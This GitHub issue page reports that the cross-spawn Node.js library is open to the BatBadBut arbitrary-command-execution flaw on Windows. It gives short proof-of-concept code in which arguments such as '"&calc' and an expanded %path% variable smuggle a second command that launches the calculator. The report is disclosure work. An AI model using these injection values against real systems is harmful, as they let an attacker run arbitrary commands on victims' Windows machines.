Skip to content

Vulnerable to arbitrary command execution on Windows (BatBadBut) #171

Open
Open
Vulnerable to arbitrary command execution on Windows (BatBadBut)#171
@mohd-akram

Description

@mohd-akram
mohd-akram
opened on Feb 21, 2025

See https://flatt.tech/research/posts/batbadbut-you-cant-securely-execute-commands-on-windows/

Example:

rem test.cmd
echo %1

Arbitrary execution:

const spawn = require('cross-spawn');
// Launches calculator
spawn.sync('test.cmd', ['"&calc']);

Variable expansion:

// test.js
const spawn = require('cross-spawn');
// Launches calculator
spawn.sync('test.cmd', ['%path%']);
C:\> set path^^=^"^&calc
C:\> node test.js

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Fields

    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions